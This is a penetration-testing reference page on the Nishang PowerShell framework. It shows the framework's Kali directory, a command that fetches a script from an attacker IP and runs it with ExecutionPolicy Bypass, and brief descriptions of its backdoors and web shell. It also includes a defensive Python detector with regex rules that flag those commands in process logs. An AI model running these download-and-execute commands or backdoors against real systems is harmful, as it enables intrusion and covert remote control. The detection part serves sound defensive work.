Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing.
Link: https://github.com/samratashok/nishang
It is also installed by default on Kali:
root@kali:~# ls -l /usr/share/nishang/
total 48
drwxr-xr-x 2 root root 4096 Jun 4 11:15 Antak-WebShell
drwxr-xr-x 2 root root 4096 Jun 4 11:15 Backdoors
drwxr-xr-x 2 root root 4096 Jun 4 11:15 Escalation
drwxr-xr-x 2 root root 4096 Jun 4 11:15 Execution
drwxr-xr-x 2 root root 4096 Jun 4 11:15 Gather
drwxr-xr-x 2 root root 4096 Jun 4 11:15 Misc
-rw-r--r-- 1 root root 495 Jun 4 11:14 nishang.psm1
drwxr-xr-x 2 root root 4096 Jun 4 11:15 Pivot
drwxr-xr-x 2 root root 4096 Jun 4 11:15 powerpreter
drwxr-xr-x 2 root root 4096 Jun 4 11:15 Prasadhak
drwxr-xr-x 2 root root 4096 Jun 4 11:15 Scan
drwxr-xr-x 2 root root 4096 Jun 4 11:15 Utility
The Nishang script first has to be transferred to the target computer:
powershell iwr -uri 10.10.14.14/{Nishang script}
Then run the script:
powershell.exe -ExecutionPolicy Bypass -NonInteractive -File script.ps1
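From the defender's side, the two command lines above are exactly what process-creation telemetry should catch. The following is an added example (not code from Nishang or from this page) that runs a small rule set over constructed process-creation records and flags PowerShell invocations that download from a raw IP address, run with ExecutionPolicy Bypass, or name a Nishang script; the event field names, hosts and users are assumptions.

```python
import re

# Constructed sample process-creation records (fields a Sysmon Event ID 1 or
# Windows 4688 record with command-line auditing carries); not real telemetry.
SAMPLE_EVENTS = [
    {"host": "WS01", "user": "alice",
     "cmdline": "powershell iwr -uri 10.10.14.14/Gupt-Backdoor.ps1"},
    {"host": "WS01", "user": "alice",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -NonInteractive -File script.ps1"},
    {"host": "WS02", "user": "bob",
     "cmdline": "powershell.exe -NoProfile -File C:\\Scripts\\Backup.ps1"},
    {"host": "SRV01", "user": "svc_deploy", "cmdline": "notepad.exe report.txt"},
]

# Script names listed on this page; extend from the repository tree as needed.
NISHANG_NAMES = ("Antak", "HTTP-Backdoor", "DNS_TXT_Pwnage", "Execute-OnTime",
                 "Gupt-Backdoor", "Get-Unconstrained")

# Each check is (label, regex); POWERSHELL_RE gates everything else.
POWERSHELL_RE = re.compile(r"(?:^|[\\\s\"'])(?:powershell|pwsh)(?:\.exe)?\b", re.I)
CHECKS = [
    ("web download cmdlet", re.compile(
        r"\b(?:iwr|Invoke-WebRequest|Invoke-RestMethod|wget|curl|DownloadString|DownloadFile)\b", re.I)),
    ("URL with raw IP address", re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}/\S+")),
    ("ExecutionPolicy Bypass", re.compile(r"-(?:ExecutionPolicy|ep)\s+Bypass\b", re.I)),
    ("non-interactive script file execution",
     re.compile(r"-NonI(?:nteractive)?\b.*-File\b|-File\b.*-NonI(?:nteractive)?\b", re.I)),
    ("known Nishang script name", re.compile("|".join(map(re.escape, NISHANG_NAMES)), re.I)),
]


def classify(cmdline: str) -> list[str]:
    """Return the labels of every check matched by a PowerShell command line.
    An empty list means nothing matched, or the process is not PowerShell at all."""
    if not POWERSHELL_RE.search(cmdline):
        return []
    return [label for label, rx in CHECKS if rx.search(cmdline)]


def find_suspicious(events, min_hits=2):
    """Flag events matching at least min_hits checks; a single hit (e.g. a plain
    -File run of a scheduled script) is routine administration and would be noisy."""
    alerts = []
    for ev in events:
        hits = classify(ev["cmdline"])
        if len(hits) >= min_hits:
            alerts.append((ev["host"], ev["user"], hits))
    return alerts
```

On the sample data the backup script on WS02 is not flagged, while both command lines from this page are.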
Nishang currently contains the following scripts and payloads.
Get-Unconstrained – Find computers in active directory which have Kerberos Unconstrained Delegation enabled.
Antak – Execute PowerShell scripts in memory, run commands, and download and upload files using this webshell.
HTTP-Backdoor – A backdoor which can receive instructions from third party websites and execute PowerShell scripts in memory.
DNS_TXT_Pwnage – A backdoor which can receive commands and PowerShell scripts from DNS TXT queries, execute them on a target, and be remotely controlled using the queries.
Execute-OnTime – A backdoor which can execute PowerShell scripts at a given time on a target.
Gupt-Backdoor – A backdoor which can receive commands and scripts from a WLAN SSID without connecting to it.